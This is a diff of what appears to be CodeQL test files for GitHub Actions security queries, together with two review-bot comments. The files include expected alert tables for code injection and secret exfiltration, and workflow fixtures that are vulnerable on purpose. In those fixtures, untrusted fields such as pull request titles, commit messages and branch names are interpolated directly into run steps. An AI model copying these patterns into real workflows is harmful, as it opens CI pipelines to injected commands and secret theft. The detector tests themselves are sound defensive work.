| .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | ${{env.pr_message}} | +| .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | ${{ github.event.pages[1].title }} | +| .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | ${{ github.event.pages[11].title }} | +| .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | ${{ github.event.pages[0].page_name }} | +| .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | ${{ github.event.pages[2222].page_name }} | +| .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | .github/workflows/inter-job0.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | +| .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | .github/workflows/inter-job1.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | +| .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | .github/workflows/inter-job2.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | +| .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | .github/workflows/inter-job4.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | +| .github/workflows/inter-job5.yml:45:20:45:53 | needs.job1.outputs.job_output | .github/workflows/inter-job5.yml:45:20:45:53 | needs.job1.outputs.job_output | .github/workflows/inter-job5.yml:45:20:45:53 | needs.job1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/inter-job5.yml:45:20:45:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | +| .github/workflows/priv_pull_request.yml:14:21:14:57 | github.event.pull_request.body | .github/workflows/priv_pull_request.yml:14:21:14:57 | github.event.pull_request.body | .github/workflows/priv_pull_request.yml:14:21:14:57 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/priv_pull_request.yml:14:21:14:57 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | +| .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | ${{ github.event.commits[11].message }} | +| .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | ${{ github.event.commits[11].author.email }} | +| .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | ${{ github.event.commits[11].author.name }} | +| .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | ${{ github.event.head_commit.message }} | +| .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | ${{ github.event.head_commit.author.email }} | +| .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | ${{ github.event.head_commit.author.name }} | +| .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | ${{ github.event.head_commit.committer.email }} | +| .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | ${{ github.event.head_commit.committer.name }} | +| .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | ${{ github.event.commits[11].committer.email }} | +| .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | ${{ github.event.commits[11].committer.name }} | +| .github/workflows/push_and_workflow_dispatch.yml:9:19:9:57 | github.event.commits[11].message | .github/workflows/push_and_workflow_dispatch.yml:9:19:9:57 | github.event.commits[11].message | .github/workflows/push_and_workflow_dispatch.yml:9:19:9:57 | github.event.commits[11].message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push_and_workflow_dispatch.yml:9:19:9:57 | github.event.commits[11].message | ${{ github.event.commits[11].message }} | +| .github/workflows/push_and_workflow_dispatch.yml:10:19:10:62 | github.event.commits[11].author.email | .github/workflows/push_and_workflow_dispatch.yml:10:19:10:62 | github.event.commits[11].author.email | .github/workflows/push_and_workflow_dispatch.yml:10:19:10:62 | github.event.commits[11].author.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push_and_workflow_dispatch.yml:10:19:10:62 | github.event.commits[11].author.email | ${{ github.event.commits[11].author.email }} | +| .github/workflows/push_and_workflow_dispatch.yml:11:19:11:61 | github.event.commits[11].author.name | .github/workflows/push_and_workflow_dispatch.yml:11:19:11:61 | github.event.commits[11].author.name | .github/workflows/push_and_workflow_dispatch.yml:11:19:11:61 | github.event.commits[11].author.name | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/push_and_workflow_dispatch.yml:11:19:11:61 | github.event.commits[11].author.name | ${{ github.event.commits[11].author.name }} | +| .github/workflows/push_and_workflow_dispatch.yml:12:19:12:57 | github.event.head_commit.message | .github/workflows/push_and_workflow_dispatch.yml:12:19:12:57 | github.event.head_commit.message | .github/workflows/push_and_workflow_dispatch.yml:12:19:12:57 | github.event.head_commit.message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push_and_workflow_dispatch.yml:12:19:12:57 | github.event.head_commit.message | ${{ github.event.head_commit.message }} | +| .github/workflows/push_and_workflow_dispatch.yml:13:19:13:62 | github.event.head_commit.author.email | .github/workflows/push_and_workflow_dispatch.yml:13:19:13:62 | github.event.head_commit.author.email | .github/workflows/push_and_workflow_dispatch.yml:13:19:13:62 | github.event.head_commit.author.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push_and_workflow_dispatch.yml:13:19:13:62 | github.event.head_commit.author.email | ${{ github.event.head_commit.author.email }} | +| .github/workflows/push_and_workflow_dispatch.yml:14:19:14:61 | github.event.head_commit.author.name | .github/workflows/push_and_workflow_dispatch.yml:14:19:14:61 | github.event.head_commit.author.name | .github/workflows/push_and_workflow_dispatch.yml:14:19:14:61 | github.event.head_commit.author.name | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/push_and_workflow_dispatch.yml:14:19:14:61 | github.event.head_commit.author.name | ${{ github.event.head_commit.author.name }} | +| .github/workflows/push_and_workflow_dispatch.yml:15:19:15:65 | github.event.head_commit.committer.email | .github/workflows/push_and_workflow_dispatch.yml:15:19:15:65 | github.event.head_commit.committer.email | .github/workflows/push_and_workflow_dispatch.yml:15:19:15:65 | github.event.head_commit.committer.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push_and_workflow_dispatch.yml:15:19:15:65 | github.event.head_commit.committer.email | ${{ github.event.head_commit.committer.email }} | +| .github/workflows/push_and_workflow_dispatch.yml:16:19:16:64 | github.event.head_commit.committer.name | .github/workflows/push_and_workflow_dispatch.yml:16:19:16:64 | github.event.head_commit.committer.name | .github/workflows/push_and_workflow_dispatch.yml:16:19:16:64 | github.event.head_commit.committer.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push_and_workflow_dispatch.yml:16:19:16:64 | github.event.head_commit.committer.name | ${{ github.event.head_commit.committer.name }} | +| .github/workflows/push_and_workflow_dispatch.yml:17:19:17:65 | github.event.commits[11].committer.email | .github/workflows/push_and_workflow_dispatch.yml:17:19:17:65 | github.event.commits[11].committer.email | .github/workflows/push_and_workflow_dispatch.yml:17:19:17:65 | github.event.commits[11].committer.email | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/push_and_workflow_dispatch.yml:17:19:17:65 | github.event.commits[11].committer.email | ${{ github.event.commits[11].committer.email }} | +| .github/workflows/push_and_workflow_dispatch.yml:18:19:18:64 | github.event.commits[11].committer.name | .github/workflows/push_and_workflow_dispatch.yml:18:19:18:64 | github.event.commits[11].committer.name | .github/workflows/push_and_workflow_dispatch.yml:18:19:18:64 | github.event.commits[11].committer.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push_and_workflow_dispatch.yml:18:19:18:64 | github.event.commits[11].committer.name | ${{ github.event.commits[11].committer.name }} | +| .github/workflows/reusable-workflow-1.yml:36:21:36:39 | inputs.taint | .github/workflows/reusable-workflow-caller-1.yml:11:15:11:52 | github.event.pull_request.title | .github/workflows/reusable-workflow-1.yml:36:21:36:39 | inputs.taint | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/reusable-workflow-1.yml:36:21:36:39 | inputs.taint | ${{ inputs.taint }} | +| .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | .github/workflows/reusable-workflow-1.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | ${{ env.log }} | +| .github/workflows/reusable-workflow-1.yml:66:34:66:52 | env.prev_log | .github/workflows/reusable-workflow-1.yml:45:24:45:61 | github.event.changes.title.from | .github/workflows/reusable-workflow-1.yml:66:34:66:52 | env.prev_log | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/reusable-workflow-1.yml:66:34:66:52 | env.prev_log | ${{ env.prev_log }} | +| .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | ${{steps.summary.outputs.value}} | +| .github/workflows/test10.yml:57:34:57:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:57:34:57:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:57:34:57:77 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test10.yml:57:34:57:77 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | +| .github/workflows/test10.yml:147:34:147:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:147:34:147:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:147:34:147:77 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test10.yml:147:34:147:77 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | +| .github/workflows/test10.yml:240:34:240:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:240:34:240:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:240:34:240:77 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/test10.yml:240:34:240:77 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | +| .github/workflows/test10.yml:333:34:333:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:333:34:333:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:333:34:333:77 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test10.yml:333:34:333:77 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | +| .github/workflows/test10.yml:423:34:423:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:423:34:423:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:423:34:423:77 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test10.yml:423:34:423:77 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | +| .github/workflows/test10.yml:518:34:518:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:518:34:518:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:518:34:518:77 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test10.yml:518:34:518:77 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | +| .github/workflows/test20.yml:15:54:15:94 | github.event.pull_request.head.ref | .github/workflows/test20.yml:15:54:15:94 | github.event.pull_request.head.ref | .github/workflows/test20.yml:15:54:15:94 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/test20.yml:15:54:15:94 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | +| .github/workflows/test21.yml:22:35:22:73 | github.event.head_commit.message | .github/workflows/test21.yml:22:35:22:73 | github.event.head_commit.message | .github/workflows/test21.yml:22:35:22:73 | github.event.head_commit.message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test21.yml:22:35:22:73 | github.event.head_commit.message | ${{ github.event.head_commit.message }} | +| .github/workflows/test21.yml:23:36:23:74 | github.event.head_commit.message | .github/workflows/test21.yml:23:36:23:74 | github.event.head_commit.message | .github/workflows/test21.yml:23:36:23:74 | github.event.head_commit.message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test21.yml:23:36:23:74 | github.event.head_commit.message | ${{ github.event.head_commit.message }} | +| .github/workflows/test21.yml:24:50:24:88 | github.event.head_commit.message | .github/workflows/test21.yml:24:50:24:88 | github.event.head_commit.message | .github/workflows/test21.yml:24:50:24:88 | github.event.head_commit.message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test21.yml:24:50:24:88 | github.event.head_commit.message | ${{ github.event.head_commit.message }} | +| .github/workflows/workflow_run_branches1.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches1.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches1.yml:13:20:13:63 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/workflow_run_branches1.yml:13:20:13:63 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | +| .github/workflows/workflow_run_branches2.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches2.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches2.yml:13:20:13:63 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run_branches2.yml:13:20:13:63 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | +| .github/workflows/workflow_run_branches4.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches4.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches4.yml:13:20:13:63 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run_branches4.yml:13:20:13:63 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} |
diff --git a/actions/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.qlref b/actions/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.qlref
index 5717bcec7322..f7ce5674994d 100644
--- a/actions/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.qlref
+++ b/actions/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.qlref
@@ -1,2 +1 @@
-query: Security/CWE-094/CodeInjectionMedium.ql
-postprocess: utils/test/InlineExpectationsTestQuery.ql
+Security/CWE-094/CodeInjectionMedium.ql
diff --git a/actions/ql/test/query-tests/Security/CWE-1395/.github/workflows/test1.yml b/actions/ql/test/query-tests/Security/CWE-1395/.github/workflows/test1.yml
index 34b85a6bd831..5153e2cc7804 100644
--- a/actions/ql/test/query-tests/Security/CWE-1395/.github/workflows/test1.yml
+++ b/actions/ql/test/query-tests/Security/CWE-1395/.github/workflows/test1.yml
@@ -14,8 +14,8 @@ jobs:
 - uses: actions/download-artifact@v3 # SECURE
 - uses: actions/download-artifact@v3.0.2 # SECURE
 - uses: actions/download-artifact@v4.1.0
- - uses: actions/download-artifact@eaceaf801fd36c7dee90939fad912460b18a1ffe # v4.1.2 # $ Alert
- - uses: actions/download-artifact@9bc31d5ccc31df68ecc42ccf4149144866c47d8a # v3.0.2 # SECURE # $ Alert
+ - uses: actions/download-artifact@eaceaf801fd36c7dee90939fad912460b18a1ffe # v4.1.2
+ - uses: actions/download-artifact@9bc31d5ccc31df68ecc42ccf4149144866c47d8a # v3.0.2 # SECURE
 - uses: actions/download-artifact@v4 # SECURE
 - uses: actions/download-artifact@v4.1.7 # SECURE
 - uses: actions/download-artifact@v4.1.8 # SECURE
diff --git a/actions/ql/test/query-tests/Security/CWE-1395/UseOfKnownVulnerableAction.qlref b/actions/ql/test/query-tests/Security/CWE-1395/UseOfKnownVulnerableAction.qlref
index fe1d219fbffa..c9bd66e4dd06 100644
--- a/actions/ql/test/query-tests/Security/CWE-1395/UseOfKnownVulnerableAction.qlref
+++ b/actions/ql/test/query-tests/Security/CWE-1395/UseOfKnownVulnerableAction.qlref
@@ -1,2 +1,2 @@
-query: Security/CWE-1395/UseOfKnownVulnerableAction.ql
-postprocess: utils/test/InlineExpectationsTestQuery.ql
+Security/CWE-1395/UseOfKnownVulnerableAction.ql
+
diff --git a/actions/ql/test/query-tests/Security/CWE-200/.github/workflows/test1.yml b/actions/ql/test/query-tests/Security/CWE-200/.github/workflows/test1.yml
index 657204ffd536..ed496f3eeb29 100644
--- a/actions/ql/test/query-tests/Security/CWE-200/.github/workflows/test1.yml
+++ b/actions/ql/test/query-tests/Security/CWE-200/.github/workflows/test1.yml
@@ -13,4 +13,4 @@ jobs:
 with:
 args: >
 -Dsonar.scm.revision=${{ github.event.workflow_run.head_sha }}
- -Dsonar.pullrequest.key=${{ github.event.pull_request.title }} # $ Alert
+ -Dsonar.pullrequest.key=${{ github.event.pull_request.title }}
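Review bot: The `# SECURE` comment kept on the `actions/download-artifact@9bc31d5ccc31df68ecc42ccf4149144866c47d8a # v3.0.2` line of `CWE-1395/.github/workflows/test1.yml` now stands alone, although the `# $ Alert` marker removed from that same line indicates the query was expected to report it. Whether that alert is still listed in the `.expected` file is not visible in this hunk, but if it is, the fixture labels as safe a line the test treats as a finding. I would replace the label with a comment that states the expectation, for example `# v3.0.2 by SHA; reported by UseOfKnownVulnerableAction`, or drop `# SECURE` from this one line. The `eaceaf801fd36c7dee90939fad912460b18a1ffe # v4.1.2` line above it loses its marker too but carries no conflicting label.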
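Review bot: The new `UseOfKnownVulnerableAction.qlref` ends with an added empty line (`@@ -1,2 +1,2 @@`, second `+` line blank), and `SecretExfiltration.qlref` and `MissingActionsPermissions.qlref` further down do the same, whereas `CodeInjectionMedium.qlref` in this patch is reduced to the path alone (`@@ -1,2 +1 @@`). Dropping the blank line so the file is just `Security/CWE-1395/UseOfKnownVulnerableAction.ql` would keep the four files uniform. Separately, with `postprocess: utils/test/InlineExpectationsTestQuery.ql` removed, nothing in these tests ties an expected alert to the fixture line that causes it; for security queries that makes an unintended change in the `.expected` table easier to accept unnoticed, so it is worth confirming this is intended.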
diff --git a/actions/ql/test/query-tests/Security/CWE-200/SecretExfiltration.expected b/actions/ql/test/query-tests/Security/CWE-200/SecretExfiltration.expected
index 75bf3897164a..59b58e03be78 100644
--- a/actions/ql/test/query-tests/Security/CWE-200/SecretExfiltration.expected
+++ b/actions/ql/test/query-tests/Security/CWE-200/SecretExfiltration.expected
@@ -1,6 +1,6 @@ -#select -| .github/workflows/test1.yml:15:11:16:75 | github.event.pull_request.title | .github/workflows/test1.yml:15:11:16:75 | github.event.pull_request.title | .github/workflows/test1.yml:15:11:16:75 | github.event.pull_request.title | Potential secret exfiltration in $@, which may be leaked to an attacker-controlled resource. | .github/workflows/test1.yml:15:11:16:75 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | edges nodes | .github/workflows/test1.yml:15:11:16:75 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | subpaths +#select +| .github/workflows/test1.yml:15:11:16:75 | github.event.pull_request.title | .github/workflows/test1.yml:15:11:16:75 | github.event.pull_request.title | .github/workflows/test1.yml:15:11:16:75 | github.event.pull_request.title | Potential secret exfiltration in $@, which may be leaked to an attacker-controlled resource. | .github/workflows/test1.yml:15:11:16:75 | github.event.pull_request.title | ${{ github.event.pull_request.title }} |
diff --git a/actions/ql/test/query-tests/Security/CWE-200/SecretExfiltration.qlref b/actions/ql/test/query-tests/Security/CWE-200/SecretExfiltration.qlref
index 48ae5cf9646b..c750afbeaf4a 100644
--- a/actions/ql/test/query-tests/Security/CWE-200/SecretExfiltration.qlref
+++ b/actions/ql/test/query-tests/Security/CWE-200/SecretExfiltration.qlref
@@ -1,2 +1,2 @@
-query: experimental/Security/CWE-200/SecretExfiltration.ql
-postprocess: utils/test/InlineExpectationsTestQuery.ql
+experimental/Security/CWE-200/SecretExfiltration.ql
+
diff --git a/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms1.yml b/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms1.yml
index 2ee5623b64cf..f000ad6a287a 100644
--- a/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms1.yml
+++ b/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms1.yml
@@ -6,5 +6,5 @@ jobs:
 name: Build and test
 runs-on: ubuntu-latest
 steps:
- - uses: actions/checkout@v2 # $ Alert
+ - uses: actions/checkout@v2
diff --git a/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms10.yml b/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms10.yml
index a26e39cbda0e..6530bd5f08e0 100644
--- a/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms10.yml
+++ b/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms10.yml
@@ -7,4 +7,4 @@ jobs:
 name: Build and test
 runs-on: ubuntu-latest
 steps:
- - uses: actions/ai-inference # $ Alert
+ - uses: actions/ai-inference
diff --git a/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms2.yml b/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms2.yml
index 4db5fc755232..6f7844f17cb2 100644
--- a/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms2.yml
+++ b/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms2.yml
@@ -7,7 +7,7 @@ jobs:
 runs-on: ubuntu-latest
 steps:
 - uses: actions/checkout@v2
- test: # $ Alert
+ test:
 name: Build and test
 runs-on: ubuntu-latest
 permissions: {}
diff --git a/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms5.yml b/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms5.yml
index c5448530fbb9..4353c2804976 100644
--- a/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms5.yml
+++ b/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms5.yml
@@ -7,6 +7,6 @@ jobs: name: Build and test runs-on: ubuntu-latest steps: - - uses: actions/checkout@v2 # $ Alert + - uses: actions/checkout@v2 diff --git a/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms6.yml b/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms6.yml index ae9514f93e67..2824ca14a7e1 100644 --- a/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms6.yml +++ b/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms6.yml @@ -8,6 +8,6 @@ jobs: runs-on: ubuntu-latest steps: - uses: actions/checkout@v2 - - uses: actions/jekyll-build-pages # $ Alert + - uses: actions/jekyll-build-pages diff --git a/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms7.yml b/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms7.yml index 85434ad03460..0ec255f0d109 100644 --- a/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms7.yml +++ b/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms7.yml @@ -7,4 +7,4 @@ jobs: name: Build and test runs-on: ubuntu-latest steps: - - uses: actions/add-to-project@v2 # $ Alert + - uses: actions/add-to-project@v2 diff --git a/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms8.yml b/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms8.yml index 137fa791353c..1a10bd6a7d6c 100644 --- a/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms8.yml +++ b/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms8.yml @@ -7,4 +7,4 @@ jobs: name: Build and test runs-on: ubuntu-latest steps: - - uses: actions/deploy-pages # $ Alert + - uses: actions/deploy-pages diff --git a/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms9.yml b/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms9.yml index 8981c8663825..b6ae16bf9e26 100644 --- a/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms9.yml 
+++ b/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms9.yml @@ -7,4 +7,4 @@ jobs: name: Build and test runs-on: ubuntu-latest steps: - - uses: actions/delete-package-versions # $ Alert + - uses: actions/delete-package-versions diff --git a/actions/ql/test/query-tests/Security/CWE-275/MissingActionsPermissions.qlref b/actions/ql/test/query-tests/Security/CWE-275/MissingActionsPermissions.qlref index 6837eb5124c9..ad1c6a996609 100644 --- a/actions/ql/test/query-tests/Security/CWE-275/MissingActionsPermissions.qlref +++ b/actions/ql/test/query-tests/Security/CWE-275/MissingActionsPermissions.qlref @@ -1,2 +1,2 @@ -query: Security/CWE-275/MissingActionsPermissions.ql -postprocess: utils/test/InlineExpectationsTestQuery.ql +Security/CWE-275/MissingActionsPermissions.ql + diff --git a/actions/ql/test/query-tests/Security/CWE-284/.github/workflows/test1.yml b/actions/ql/test/query-tests/Security/CWE-284/.github/workflows/test1.yml index 24ad2ff91c80..37eb2bddb58c 100644 --- a/actions/ql/test/query-tests/Security/CWE-284/.github/workflows/test1.yml +++ b/actions/ql/test/query-tests/Security/CWE-284/.github/workflows/test1.yml @@ -8,13 +8,13 @@ jobs: runs-on: [self-hosted, X64, Linux, 16c32g] steps: - run: cmd - test2: # $ Alert + test2: runs-on: group: my-group labels: [self-hosted, label-1] steps: - run: cmd - test3: # $ Alert + test3: runs-on: - 'self-hosted' - 'linux' @@ -22,11 +22,11 @@ jobs: - 'metal' steps: - run: echo "foo" - test4: # $ Alert + 